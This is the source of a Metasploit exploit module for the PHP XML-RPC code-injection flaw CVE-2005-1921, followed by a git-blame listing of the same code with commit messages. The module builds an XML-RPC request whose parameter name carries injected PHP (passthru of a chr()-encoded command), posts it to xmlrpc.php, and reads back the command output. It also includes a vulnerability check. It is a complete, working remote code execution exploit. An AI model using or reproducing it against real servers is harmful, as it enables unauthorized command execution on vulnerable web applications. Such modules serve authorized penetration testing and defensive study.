modules/exploits/unix/webapp/php_xmlrpc_eval.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # XXX This module needs an overhaul
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'PHP XML-RPC Arbitrary Code Execution',
      'Description'    => %q{
          This module exploits an arbitrary code execution flaw
        discovered in many implementations of the PHP XML-RPC module.
        This flaw is exploitable through a number of PHP web
        applications, including but not limited to Drupal, Wordpress,
        Postnuke, and TikiWiki.
      },
      'Author'         => [ 'hdm', 'cazz' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2005-1921'],
          ['OSVDB', '17793'],
          ['BID', '14088'],
        ],
      'Privileged'     => false,
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Payload'        => {
          'Space' => 512,
          'DisableNops' => true,
          'Keys'  => ['cmd', 'cmd_bash'],
        },
      'Targets'        => [ ['Automatic', { }], ],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2005-06-29'
      ))


    register_options(
      [
        OptString.new('PATH', [ true,  "Path to xmlrpc.php", '/xmlrpc.php']),
      ])

    deregister_options(
      'HTTP::junk_params', # not your typical POST, so don't inject params.
      'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now.
      )
  end

  def go(command)

    encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
    wrapper = rand_text_alphanumeric(rand(128)+32)

    cmd = "echo('#{wrapper}'); passthru(#{ encoded }); echo('#{wrapper}');;"

    xml =
    '<?xml version="1.0"?>' +
    "<methodCall>" +
      "<methodName>"+ rand_text_alphanumeric(rand(128)+32) + "</methodName>" +
      "<params><param>" +
        "<name>" + rand_text_alphanumeric(rand(128)+32) + "');#{cmd}//</name>" +
        "<value>" + rand_text_alphanumeric(rand(128)+32) + "</value>" +
      "</param></params>" +
    "</methodCall>";

    res = send_request_cgi({
        'uri'          => normalize_uri(datastore['PATH']),
        'method'       => 'POST',
        'ctype'        => 'application/xml',
        'data'         => xml,
      }, 5)

    if (res and res.body)
      b = /#{wrapper}(.*)#{wrapper}/sm.match(res.body)
      if b
        return b.captures[0]
      elsif datastore['HTTP::chunked']
        b = /chunked Transfer-Encoding forbidden/.match(res.body)
        if b
          fail_with(Failure::BadConfig, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005. Try disabling HTTP::chunked and trying again.')
        end
      end
    end

    return nil
  end

  def check
    response = go("echo ownable")
    if (!response.nil? and response =~ /ownable/sm)
      return Exploit::CheckCode::Vulnerable
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    response = go(payload.encoded)
    if response == nil
      print_error('exploit failed: no response')
    else
      if response.length == 0
        print_good('Exploit Successful')
      else
        print_status("Command returned #{response}")
      end
      handler
    end
  end
end
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! 2009-12-06 05:50:37 +00:00			`Rank = ExcellentRanking`
Retab modules 2013-08-30 16:28:54 -05:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::HttpClient`
Retab modules 2013-08-30 16:28:54 -05:00
Moved the other web app bugs into the right place, added php_wordpress_lastpost 2007-01-05 05:58:13 +00:00			`# XXX This module needs an overhaul`
* xmlrpc vuln 2006-01-20 20:18:55 +00:00			`def initialize(info = {})`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`super(update_info(info,`
* xmlrpc vuln 2006-01-20 20:18:55 +00:00			`'Name' => 'PHP XML-RPC Arbitrary Code Execution',`
			`'Description' => %q{`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`This module exploits an arbitrary code execution flaw`
Massive update to tab indentation (used ./dev/tabify.rb) 2006-01-27 05:00:35 +00:00			`discovered in many implementations of the PHP XML-RPC module.`
			`This flaw is exploitable through a number of PHP web`
			`applications, including but not limited to Drupal, Wordpress,`
			`Postnuke, and TikiWiki.`
* xmlrpc vuln 2006-01-20 20:18:55 +00:00			`},`
			`'Author' => [ 'hdm', 'cazz' ],`
New licensing terms, revision bump to v3 2006-01-21 22:10:20 +00:00			`'License' => MSF_LICENSE,`
* xmlrpc vuln 2006-01-20 20:18:55 +00:00			`'References' =>`
			`[`
Massive update to tab indentation (used ./dev/tabify.rb) 2006-01-27 05:00:35 +00:00			`['CVE', '2005-1921'],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`['OSVDB', '17793'],`
OSVDB references updates from Steve Tornio 2009-07-16 16:02:24 +00:00			`['BID', '14088'],`
* xmlrpc vuln 2006-01-20 20:18:55 +00:00			`],`
			`'Privileged' => false,`
Give these two old modules a chance to work by setting a proper arch 2012-02-21 22:41:05 -07:00			`'Platform' => ['unix'],`
			`'Arch' => ARCH_CMD,`
* xmlrpc vuln 2006-01-20 20:18:55 +00:00			`'Payload' => {`
Massive update to tab indentation (used ./dev/tabify.rb) 2006-01-27 05:00:35 +00:00			`'Space' => 512,`
			`'DisableNops' => true,`
			`'Keys' => ['cmd', 'cmd_bash'],`
* xmlrpc vuln 2006-01-20 20:18:55 +00:00			`},`
Massive update to tab indentation (used ./dev/tabify.rb) 2006-01-27 05:00:35 +00:00			`'Targets' => [ ['Automatic', { }], ],`
			`'DefaultTarget' => 0,`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2005-06-29'`
Massive update to tab indentation (used ./dev/tabify.rb) 2006-01-27 05:00:35 +00:00			`))`
Retab modules 2013-08-30 16:28:54 -05:00

Massive update to tab indentation (used ./dev/tabify.rb) 2006-01-27 05:00:35 +00:00			`register_options(`
			`[`
			`OptString.new('PATH', [ true, "Path to xmlrpc.php", '/xmlrpc.php']),`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
Retab modules 2013-08-30 16:28:54 -05:00
* wee, more php bullshit 2006-01-26 02:07:59 +00:00			`deregister_options(`
			`'HTTP::junk_params', # not your typical POST, so don't inject params.`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now.`
* wee, more php bullshit 2006-01-26 02:07:59 +00:00			`)`
* xmlrpc vuln 2006-01-20 20:18:55 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
* wee, more php bullshit 2006-01-26 02:07:59 +00:00			`def go(command)`
Retab modules 2013-08-30 16:28:54 -05:00
Massive update to tab indentation (used ./dev/tabify.rb) 2006-01-27 05:00:35 +00:00			`encoded = command.unpack("C*").collect{\|x\| "chr(#{x})"}.join('.')`
updated modules to use base class rand_xxx methods 2007-03-01 08:21:36 +00:00			`wrapper = rand_text_alphanumeric(rand(128)+32)`
Retab modules 2013-08-30 16:28:54 -05:00
Massive update to tab indentation (used ./dev/tabify.rb) 2006-01-27 05:00:35 +00:00			`cmd = "echo('#{wrapper}'); passthru(#{ encoded }); echo('#{wrapper}');;"`
Retab modules 2013-08-30 16:28:54 -05:00
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`xml =`
Massive update to tab indentation (used ./dev/tabify.rb) 2006-01-27 05:00:35 +00:00			`'<?xml version="1.0"?>' +`
			`"<methodCall>" +`
updated modules to use base class rand_xxx methods 2007-03-01 08:21:36 +00:00			`"<methodName>"+ rand_text_alphanumeric(rand(128)+32) + "</methodName>" +`
Massive update to tab indentation (used ./dev/tabify.rb) 2006-01-27 05:00:35 +00:00			`"<params><param>" +`
updated modules to use base class rand_xxx methods 2007-03-01 08:21:36 +00:00			`"<name>" + rand_text_alphanumeric(rand(128)+32) + "');#{cmd}//</name>" +`
			`"<value>" + rand_text_alphanumeric(rand(128)+32) + "</value>" +`
Massive update to tab indentation (used ./dev/tabify.rb) 2006-01-27 05:00:35 +00:00			`"</param></params>" +`
			`"</methodCall>";`
Retab modules 2013-08-30 16:28:54 -05:00
Integration of the new HTTP Client API 2006-12-28 23:42:36 +00:00			`res = send_request_cgi({`
Add normalize_uri to modules that may have 2012-11-08 17:42:48 +01:00			`'uri' => normalize_uri(datastore['PATH']),`
various minor fixes, some added fingerprinting 2010-07-03 06:21:31 +00:00			`'method' => 'POST',`
			`'ctype' => 'application/xml',`
			`'data' => xml,`
			`}, 5)`
Retab modules 2013-08-30 16:28:54 -05:00
Massive update to tab indentation (used ./dev/tabify.rb) 2006-01-27 05:00:35 +00:00			`if (res and res.body)`
			`b = /#{wrapper}(.*)#{wrapper}/sm.match(res.body)`
			`if b`
			`return b.captures[0]`
remove various module hacks for the datastore defaults not preserving types 2016-03-05 23:11:39 -06:00			`elsif datastore['HTTP::chunked']`
Massive update to tab indentation (used ./dev/tabify.rb) 2006-01-27 05:00:35 +00:00			`b = /chunked Transfer-Encoding forbidden/.match(res.body)`
			`if b`
more fixes 2015-04-16 21:56:42 +02:00			`fail_with(Failure::BadConfig, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005. Try disabling HTTP::chunked and trying again.')`
Massive update to tab indentation (used ./dev/tabify.rb) 2006-01-27 05:00:35 +00:00			`end`
			`end`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Massive update to tab indentation (used ./dev/tabify.rb) 2006-01-27 05:00:35 +00:00			`return nil`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Massive update to tab indentation (used ./dev/tabify.rb) 2006-01-27 05:00:35 +00:00			`def check`
			`response = go("echo ownable")`
			`if (!response.nil? and response =~ /ownable/sm)`
			`return Exploit::CheckCode::Vulnerable`
			`end`
			`return Exploit::CheckCode::Safe`
* xmlrpc vuln 2006-01-20 20:18:55 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Massive update to tab indentation (used ./dev/tabify.rb) 2006-01-27 05:00:35 +00:00			`def exploit`
			`response = go(payload.encoded)`
			`if response == nil`
change some print_status to print_error, rename a few msft modules using msb convention 2010-07-25 21:37:54 +00:00			`print_error('exploit failed: no response')`
* wee, more php bullshit 2006-01-26 02:07:59 +00:00			`else`
Massive update to tab indentation (used ./dev/tabify.rb) 2006-01-27 05:00:35 +00:00			`if response.length == 0`
OCD - print_good & print_error 2017-07-19 12:48:52 +01:00			`print_good('Exploit Successful')`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`else`
Massive update to tab indentation (used ./dev/tabify.rb) 2006-01-27 05:00:35 +00:00			`print_status("Command returned #{response}")`
			`end`
			`handler`
			`end`
			`end`
OSVDB references updates from Steve Tornio 2009-07-16 16:02:24 +00:00			`end`